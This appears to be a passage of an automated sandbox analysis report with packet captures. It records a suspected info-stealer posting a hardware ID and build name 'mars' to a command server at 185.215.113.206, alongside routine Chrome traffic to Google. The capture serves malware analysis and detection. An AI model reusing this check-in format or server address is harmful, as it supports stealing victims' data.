                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 41 37 39 42 36 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52A79B65082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:38:04.089138031 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:38:03 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        33192.168.2.450123185.215.113.20680
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:38:13.351135015 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:38:13.991097927 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:38:13 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:38:13.993803978 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHI
                                                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                                                        Content-Length: 211
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 41 44 43 42 33 46 46 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="hwid"F72ADCB3FF603810289448------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="build"mars------BAKFCBFHJDHJKECAKEHI--
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:38:14.199376106 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:38:14 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                                                                        Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        0192.168.2.449736142.250.186.1004437788C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:07 GMT
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                        Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-lDC7NsiNOD1SzvD41w1m8A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                        Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC112INData Raw: 31 30 34 64 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 7a 6f 64 69 61 63 20 73 69 67 6e 73 20 64 61 69 6c 79 20 68 6f 72 6f 73 63 6f 70 65 20 74 6f 64 61 79 22 2c 22 63 6f 6f 70 65 72 20 72 75 73 68 22 2c 22 68 61 6e 6e 61 66 6f 72 64 20 73 75 70 65 72 6d 61 72 6b 65 74 73 22 2c 22 65 76 6f 6c 76 65 20 70 72 69 6d 65 61 70 65 20 70 6f 6b
                                                                                                                                                                                                                                                                                        Data Ascii: 104d)]}'["",["zodiac signs daily horoscope today","cooper rush","hannaford supermarkets","evolve primeape pok
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC1378INData Raw: 65 6d 6f 6e 20 67 6f 22 2c 22 73 70 61 63 65 78 20 73 74 61 72 6c 69 6e 6b 20 6c 61 75 6e 63 68 22 2c 22 6e 66 6c 20 70 6c 61 79 6f 66 66 20 70 69 63 74 75 72 65 22 2c 22 6d 69 6c 69 74 61 72 79 20 76 65 74 65 72 61 6e 73 20 64 61 79 20 66 72 65 65 20 6d 65 61 6c 73 22 2c 22 74 75 6c 73 61 20 6b 69 6e 67 20 72 65 63 61 70 20 65 70 69 73 6f 64 65 20 39 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75
                                                                                                                                                                                                                                                                                        Data Ascii: emon go","spacex starlink launch","nfl playoff picture","military veterans day free meals","tulsa king recap episode 9"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC1378INData Raw: 64 61 4e 56 70 71 56 45 35 4c 59 32 4e 61 64 55 4a 4f 53 54 42 77 4d 30 70 4a 65 58 5a 30 5a 6d 31 51 57 47 39 68 57 53 73 31 64 56 64 52 59 57 78 79 5a 48 5a 44 65 43 74 72 4d 32 6c 52 63 47 70 72 4c 7a 56 53 5a 79 74 35 4e 43 73 78 52 55 67 79 54 7a 46 6c 56 46 55 32 53 30 74 4c 63 31 70 52 62 32 39 78 55 47 52 59 63 30 35 7a 55 58 4a 30 62 56 45 34 61 31 68 74 59 55 46 4c 59 6e 5a 44 64 47 70 6b 4f 57 6c 6b 59 57 6c 56 51 58 51 35 53 54 64 79 61 32 52 57 52 7a 52 6d 5a 6d 68 58 52 7a 5a 69 5a 48 64 68 61 47 46 4a 54 6c 46 73 62 57 46 50 53 55 4a 59 61 45 56 74 4d 31 42 79 62 6b 4a 79 56 33 55 79 4b 33 5a 59 65 56 64 46 64 48 42 43 59 6c 4a 44 52 7a 52 71 4d 6b 38 33 54 56 4e 33 56 57 35 43 64 31 42 68 63 33 5a 32 54 33 6f 34 63 32 73 31 62 58 4e 58 55
                                                                                                                                                                                                                                                                                        Data Ascii: daNVpqVE5LY2NadUJOSTBwM0pJeXZ0Zm1QWG9hWSs1dVdRYWxyZHZDeCtrM2lRcGprLzVSZyt5NCsxRUgyTzFlVFU2S0tLc1pRb29xUGRYc05zUXJ0bVE4a1htYUFLYnZDdGpkOWlkYWlVQXQ5STdya2RWRzRmZmhXRzZiZHdhaGFJTlFsbWFPSUJYaEVtM1BybkJyV3UyK3ZYeVdFdHBCYlJDRzRqMk83TVN3VW5Cd1Bhc3Z2T3o4c2s1bXNXU
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC1313INData Raw: 56 51 55 46 43 4d 58 63 79 61 45 5a 42 51 55 52 54 61 6d 39 32 4c 79 73 35 56 6e 52 4f 61 6c 4e 73 63 6e 45 31 4e 6c 63 78 63 44 4e 4d 55 32 35 52 4d 54 6c 6c 54 57 78 77 57 6e 6c 53 52 55 78 5a 55 6d 6f 32 65 58 5a 69 4d 57 74 50 61 6d 31 6f 51 55 46 45 64 32 5a 49 5a 6b 64 42 5a 30 4a 6d 52 56 46 32 55 6b 6c 43 52 6d 64 56 56 6b 4a 6a 55 6a 42 69 62 54 64 50 65 6e 56 50 55 7a 5a 59 63 45 74 53 64 32 4e 59 53 44 68 4a 55 6c 70 6b 56 58 6c 34 53 48 56 57 4c 31 64 6e 57 44 4e 68 62 6a 55 79 4f 47 39 4b 4b 31 52 4c 51 6e 4e 42 57 46 4e 30 63 30 39 53 65 46 56 70 52 32 68 79 62 54 4d 78 4e 32 67 30 53 6d 64 7a 56 6d 39 72 59 32 70 6a 63 46 4e 35 53 33 52 4c 65 54 4a 4f 54 30 52 53 4d 6b 5a 33 4e 6d 39 53 61 32 56 6c 59 55 64 52 51 57 56 55 56 6e 42 47 64 30
                                                                                                                                                                                                                                                                                        Data Ascii: VQUFCMXcyaEZBQURTam92Lys5VnROalNscnE1NlcxcDNMU25RMTllTWxwWnlSRUxZUmo2eXZiMWtPam1oQUFEd2ZIZkdBZ0JmRVF2UklCRmdVVkJjUjBibTdPenVPUzZYcEtSd2NYSDhJUlpkVXl4SHVWL1dnWDNhbjUyOG9KK1RLQnNBWFN0c09SeFVpR2hybTMxN2g0SmdzVm9rY2pjcFN5S3RLeTJOT0RSMkZ3Nm9Sa2VlYUdRQWVUVnBGd0
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC90INData Raw: 35 34 0d 0a 45 72 51 55 49 77 64 56 4e 42 52 56 6c 6a 52 30 46 76 52 6c 70 6f 5a 31 6c 58 61 57 77 31 57 6b 52 6d 62 33 4a 42 61 58 68 42 53 55 31 57 51 55 56 49 59 56 52 59 5a 30 4e 4e 51 30 46 44 65 45 59 30 64 31 42 73 59 30 6c 31 5a 48 6c 42 55 6d 38 35 51 57 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 54ErQUIwdVNBRVljR0FvRlpoZ1lXaWw1WkRmb3JBaXhBSU1WQUVIYVRYZ0NNQ0FDeEY0d1BsY0l1ZHlBUm85QW
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC1378INData Raw: 38 64 33 0d 0a 70 34 4e 6b 70 4a 51 55 46 74 61 55 31 52 57 45 4a 4d 59 57 56 51 5a 46 4a 56 59 56 49 77 5a 31 46 33 51 55 6c 46 51 55 68 6a 52 55 74 49 65 6d 64 50 56 6b 46 36 59 6c 4a 74 61 46 46 46 57 58 70 6a 52 55 74 45 62 48 52 75 51 6c 5a 5a 5a 56 4e 4e 65 6b 64 46 4d 45 4a 73 4f 57 74 47 51 6b 31 48 59 55 39 76 61 6d 59 32 4b 32 74 50 61 32 68 70 4d 45 46 7a 4e 30 4a 42 65 47 4e 46 51 57 4e 69 51 6e 46 45 51 7a 4a 59 4e 45 31 76 57 6c 67 79 5a 6d 5a 44 63 6a 4e 44 57 56 4e 6d 59 7a 64 46 51 7a 4a 6f 63 32 49 34 53 32 74 42 56 30 30 79 61 7a 42 77 4d 32 46 4c 4b 7a 5a 74 56 55 67 35 4e 6e 64 4a 4e 46 56 50 52 30 4e 47 53 57 31 43 52 6b 5a 33 4d 45 70 6a 4f 54 6c 6e 4e 57 35 78 59 57 39 78 53 32 5a 6d 5a 44 55 33 53 58 70 30 4d 47 4d 78 61 54 46 74
                                                                                                                                                                                                                                                                                        Data Ascii: 8d3p4NkpJQUFtaU1RWEJMYWVQZFJVYVIwZ1F3QUlFQUhjRUtIemdPVkF6YlJtaFFFWXpjRUtEbHRuQlZZZVNNekdFMEJsOWtGQk1HYU9vamY2K2tPa2hpMEFzN0JBeGNFQWNiQnFEQzJYNE1vWlgyZmZDcjNDWVNmYzdFQzJoc2I4S2tBV00yazBwM2FLKzZtVUg5NndJNFVPR0NGSW1CRkZ3MEpjOTlnNW5xYW9xS2ZmZDU3SXp0MGMxaTFt
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC888INData Raw: 75 57 46 46 73 64 6b 56 6d 4d 48 4a 48 52 43 73 34 56 48 56 35 55 45 68 76 59 6a 4e 43 51 6e 42 4c 54 7a 64 58 4c 31 42 6c 5a 56 51 35 4e 55 64 54 52 48 68 54 61 32 68 5a 56 69 38 79 62 57 59 79 51 6d 4e 76 4e 30 67 77 63 45 68 74 54 7a 5a 54 4e 47 64 70 52 44 64 52 64 54 63 77 63 32 70 79 59 33 46 72 55 55 78 77 57 47 31 51 4f 48 6f 76 4e 46 52 4b 51 32 6c 30 4d 43 74 51 62 32 70 6d 5a 58 51 77 4f 44 4a 49 63 54 6c 30 53 57 78 4c 4f 48 4e 48 52 6b 4a 47 51 6a 46 30 63 58 67 7a 55 7a 4e 6f 4c 32 56 70 65 6e 6b 76 54 31 68 4c 62 7a 56 58 56 6d 78 6b 4d 6b 77 34 55 54 4a 46 59 30 35 54 4d 46 51 78 51 6a 4d 33 55 7a 52 7a 65 6b 74 35 5a 6e 56 4e 64 6b 39 53 4d 6b 6c 72 5a 32 70 79 53 46 70 46 63 55 49 35 57 54 5a 51 62 30 74 4f 51 31 4d 35 65 44 63 34 63 31
                                                                                                                                                                                                                                                                                        Data Ascii: uWFFsdkVmMHJHRCs4VHV5UEhvYjNCQnBLTzdXL1BlZVQ5NUdTRHhTa2hZVi8ybWYyQmNvN0gwcEhtTzZTNGdpRDdRdTcwc2pyY3FrUUxwWG1QOHovNFRKQ2l0MCtQb2pmZXQwODJIcTl0SWxLOHNHRkJGQjF0cXgzUzNoL2VpenkvT1hLbzVXVmxkMkw4UTJFY05TMFQxQjM3UzRzekt5ZnVNdk9SMklrZ2pySFpFcUI5WTZQb0tOQ1M5eDc4c1
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        1192.168.2.449733142.250.186.1004437788C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        2192.168.2.449735142.250.186.1004437788C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC1042INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Version: 693618659
                                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                        Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:07 GMT
                                                                                                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC336INData Raw: 32 35 32 63 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                        Data Ascii: 252c)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC1378INData Raw: 20 67 62 5f 6f 64 20 67 62 5f 46 64 20 67 62 5f 6c 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30
                                                                                                                                                                                                                                                                                        Data Ascii: gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u00
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC1378INData Raw: 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c
                                                                                                                                                                                                                                                                                        Data Ascii: 03c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\
